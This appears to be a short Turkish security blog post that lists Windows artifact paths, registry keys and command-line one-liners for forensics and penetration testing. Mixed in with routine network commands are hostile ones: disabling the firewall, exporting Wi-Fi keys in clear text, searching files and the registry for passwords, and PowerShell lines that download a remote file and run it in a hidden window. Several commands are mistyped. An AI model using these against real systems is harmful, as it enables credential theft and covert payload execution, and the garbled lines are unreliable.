This article contains very useful information for Windows systems. In this context:

  • Forensics
  • Network
  • Malware Analysis
  • Penetration Test

you can find information about such areas in this article.


Important WINDOWS Files

Typically C:\Windows

DNS entries

Network settings

User & password hashes

Backup copy of SAM

Backup copy of SAM

Application Log

Security Log


Important REGISTRY Files


# Recently opened programs

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

# Latest documents in Office program

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs

# Manually entered URLs in Internet Explorer


# We can view past activity.



ipconfig /all

# Display IP Configuration

ipconfig /displaydns

# Displays the DNS records of domains that we have previously visited

netstat -ano

# List open connections

netstat -anop tcp 1

# Netstat loop

netstat -ani findstr LISTENING

# Displays listening ports

route print

# Display routing table

arp -a

# Show arp table

tftp -I ip GET remotefile

# Download file with TFTP frpm remote PC

netsh wlan show profiles

# Display wireless network profiles, we have previously connected 

netsh firewall set opmode disable

# Disable firewall on system

netsh wlan export profile folder=. key=clear

# Export all wireless network profiles, we have previously connected 




# Get Windows Version


# Display current username

net user %USERNAME% *

# Change password of active user

findstr /si password^ .txt I *.xmll *.xls

# search "password" word in all files

wmic qfe get

# Display system updates

reg query HKLM /f password /t REG SZ /s

# Search "password" word in Regedit

tasklist /M /FI "PID eq 6976"

# Displays the dll files used by the PID value 6976 process.

tasklist /FI "PID eq 5240"

# Show process with PID value 5240

netstat -ano | findstr "ESTABLISHED"

# Show connections


Gathering Information on Wireless Networks


netsh wlan show networks mode = bssid

netsh wlan show networks



download file

windows + r : powershell (new-object System.Net.WebClient).DownloadFile('','%TEMP%\yenismi');

 run the downloaded file

windows + r : powershell (new-object System.Net.WebClient).DownloadFile('','%TEMP%\newname');Start-Process "%TEMP%\newname.exe"

run the downloaded file (hidden)

powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('','%TEMP%\newname.exe'); Start-Process "%TEMP%\newname.exe"

 running an application in admin authority

powershell start-process cmd.exe -Verb runAs



Cyber Security Researcher

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir